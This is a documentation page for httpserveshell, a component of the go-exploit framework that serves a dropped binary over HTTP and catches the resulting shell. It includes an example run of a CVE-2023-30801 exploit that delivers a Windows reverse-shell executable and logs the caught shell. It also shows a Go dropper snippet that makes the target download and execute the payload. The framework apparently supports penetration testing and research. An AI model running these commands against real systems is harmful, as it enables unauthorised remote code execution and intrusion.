httpserveshell

package

v1.30.1 Latest Latest Go to latest Published: Oct 30, 2024 License: Apache-2.0 Imports: 7 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/vulncheck-oss/go-exploit

Links

Open Source Insights

Documentation ¶

Overview ¶

httpservershell is (literally) a combination of HTTPServeFile and (SSLShell || SimpleShellServer). The use case is when you want to drop/execute a custom binary, but you still want to catch it in go-exploit. Example usage:

	albinolobster@mournland:~/initial-access/feed/cve-2023-30801$ ./build/cve-2023-30801_linux-arm64
 		-e -rhost 10.9.49.133 -lhost 10.9.49.134 -lport 1270 -httpServeFile.BindAddr 10.9.49.134
 		-httpServeShell.SSLShell=false -httpServeFile.FilesToServe ./build/reverse_shell_windows-amd64.exe
 		-httpServeFile.TLS=true
	time=2023-09-08T11:07:20.852-04:00 level=STATUS msg="Loading the provided file: ./build/reverse_shell_windows-amd64.exe"
	time=2023-09-08T11:07:20.856-04:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
	time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting listener on 10.9.49.134:1270"
	time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.133 port=8080 ssl=false "ssl auto"=false
	time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting an HTTPS server on 10.9.49.134:8080"
	time=2023-09-08T11:07:21.092-04:00 level=STATUS msg="Using session: SID=rIOk9SAl5TXTqIfpVGmYUn/kB+VuMrqo"
	time=2023-09-08T11:07:21.095-04:00 level=STATUS msg="Selecting a Windows payload"
	time=2023-09-08T11:07:21.309-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.133:51706"
	time=2023-09-08T11:07:21.309-04:00 level=STATUS msg="Active shell from 10.9.49.133:51706"
	time=2023-09-08T11:07:23.180-04:00 level=STATUS msg="Exploit successfully completed"
	whoami
	albinolobst9bd8\albinolobster

From the exploit code, interacting with the variables isn't too much different from using httpServeFile (since httpServeShell is just a wrapper):

downAndExec := dropper.Windows.CurlHTTP(
	httpservefile.GetInstance().HTTPAddr, httpservefile.GetInstance().HTTPPort,
	httpservefile.GetInstance().TLS, httpservefile.GetInstance().GetRandomName(windows64))

Which means anything that supports httpServeShell should also trivially support httpServeFile (and the other way around as long as you are accounting for httpServeFile.SSLShell).

Constants ¶

This section is empty.

Variables ¶

This section is empty.

Functions ¶

This section is empty.

Types ¶

type Server ¶

type Server struct {
	// Indicates if we should use SSLShell or SimpleShell
	SSLShell bool
	// The HTTP address to bind to
	HTTPAddr string
	// The HTTP port to bind to
	HTTPPort int
}

func GetInstance ¶

func GetInstance() *Server

A basic singleton interface for the c2.

func (*Server) CreateFlags ¶

func (serveShell *Server) CreateFlags()

User options for serving a file over HTTP as the "c2".

func (*Server) Init ¶

func (serveShell *Server) Init(channel channel.Channel) bool

load the provided file into memory. Generate the random filename.

func (*Server) Run ¶

func (serveShell *Server) Run(timeout int)

start the http server and shell and wait for them to exit.

Source Files ¶

View all Source files

httpserveshell.go

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL